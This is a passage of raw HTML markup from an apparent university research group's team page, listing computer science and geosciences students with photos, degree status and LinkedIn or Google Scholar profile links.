h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassani</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=9KRgkCcAAAAJ&amp;hl=en&amp;oi=ao\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              